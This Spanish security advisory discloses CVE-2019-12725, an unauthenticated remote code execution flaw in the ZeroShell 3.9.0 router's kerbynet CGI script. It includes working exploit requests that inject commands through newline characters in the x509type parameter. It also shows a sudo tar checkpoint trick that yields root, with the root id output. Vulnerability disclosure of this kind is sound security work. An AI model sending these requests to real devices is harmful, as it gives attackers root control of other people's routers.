Vulnerabilidad en ZeroShell – CVE-2019-12725
Producto: ZeroShell
Fecha de publicación: 17/07/2019
Autor: Juan Manuel Fernandez (@TheXC3LL) – Tarlogic
Vulnerabilidad Zeroshell – CVE-2019-12725 Ejecución remota de código como root
La última versión de ZeroShell linux router (3.9.0) es vulnerable a una ejecución remota de código porque varios parámetros de un script son utilizados sin una validación adecuada. Esta vulnerabilidad puede ser utilizada haciendo uso de caracteres de nueva línea:
Ejemplo de parámetro vulnerable:
/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509view&User=Admin&x509type=’%0Auname -a%0A’
De forma adicional, el usuario Apache puede ejecutar el comando «tar» como root(/etc/sudoers):
(…)
apache ALL= NOPASSWD: /bin/tar
(…)
exploit de Zeroshell
Esta vulnerabilidad en ZeroShell puede ser utilizada para elevar privilegios a través de la ejecución remota de código:
/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=’%0A/etc/sudo tar -cf /dev/null /dev/null –checkpoint=1 –checkpoint-action=exec=id%0A’
uid=0(root) gid=0(root) groups=0(root)
Una actualización de seguridad será publicada en la página del fabricante.
Discover our work and cybersecurity services.